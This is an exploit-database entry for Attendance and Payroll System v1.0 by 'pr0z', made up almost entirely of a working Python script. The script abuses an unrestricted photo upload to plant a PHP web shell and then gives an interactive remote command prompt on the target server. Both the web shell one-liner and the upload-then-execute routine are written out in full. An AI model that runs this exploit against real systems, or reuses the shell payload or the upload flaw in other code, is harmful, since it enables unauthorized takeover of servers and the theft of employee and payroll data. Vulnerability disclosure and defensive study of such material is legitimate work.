Attendance and Payroll System v1.0 – Remote Code Execution (RCE)

• Exploit Database
• 17 阅读

• 作者： pr0z
  日期： 2022-03-07
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50801/

• # Exploit Title: Attendance and Payroll System v1.0 - Remote Code Execution (RCE)
  # Date: 04/03/2022
  # Exploit Author: pr0z
  # Vendor Homepage: https://www.sourcecodester.com
  # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/apsystem.zip
  # Version: v1.0
  # Tested on: Linux, MySQL, Apache
  
  import requests
  import sys
  from requests.exceptions import ConnectionError
  
  # Interface class to display terminal messages
  class Interface():
  def __init__(self):
  self.red = '\033[91m'
  self.green = '\033[92m'
  self.white = '\033[37m'
  self.yellow = '\033[93m'
  self.bold = '\033[1m'
  self.end = '\033[0m'
  
  def header(self):
  print('\n>> Attendance and Payroll System v1.0')
  print('>> Unauthenticated Remote Code Execution')
  print('>> By pr0z\n')
  
  def info(self, message):
  print(f"[{self.white}*{self.end}] {message}")
  
  def warning(self, message):
  print(f"[{self.yellow}!{self.end}] {message}")
  
  def error(self, message):
  print(f"[{self.red}x{self.end}] {message}")
  
  def success(self, message):
  print(f"[{self.green}✓{self.end}] {self.bold}{message}{self.end}")
  
  
  upload_path = '/apsystem/admin/employee_edit_photo.php'
  shell_path = '/apsystem/images/shell.php'
  #proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
  
  shell_data = "<?php if(isset($_REQUEST['cmd'])){ $cmd = ($_REQUEST['cmd']); system($cmd);}?>"
  
  multipart_form_data = {
  'id': 1,
  'upload': (''),
  }
  
  files = {'photo': ('shell.php', shell_data)}
  
  output = Interface()
  output.header()
  
  # Check for arguments
  if len(sys.argv) < 2 or '-h' in sys.argv:
  output.info("Usage: python3 rce.py http://127.0.0.1")
  sys.exit()
  
  # Upload the shell
  target = sys.argv[1]
  output.info(f"Uploading the web shell to {target}")
  r = requests.post(target + upload_path, files=files, data=multipart_form_data, verify=False)
  
  # Validating shell has been uploaded
  output.info(f"Validating the shell has been uploaded to {target}")
  r = requests.get(target + shell_path, verify=False)
  try:
  r = requests.get(target + shell_path)
  if r.status_code == 200:
  output.success('Successfully connected to web shell\n')
  else:
  raise Exception
  except ConnectionError:
  output.error('We were unable to establish a connection')
  sys.exit()
  except:
  output.error('Something unexpected happened')
  sys.exit()
  
  # Remote code execution
  while True:
  try:
  cmd = input("\033[91mRCE\033[0m > ")
  if cmd == 'exit':
  raise KeyboardInterrupt
  r = requests.get(target + shell_path + "?cmd=" + cmd, verify=False)
  if r.status_code == 200:
  print(r.text)
  else:
  raise Exception
  except KeyboardInterrupt:
  sys.exit()
  except ConnectionError:
  output.error('We lost our connection to the web shell')
  sys.exit()
  except:
  output.error('Something unexpected happened')
  sys.exit()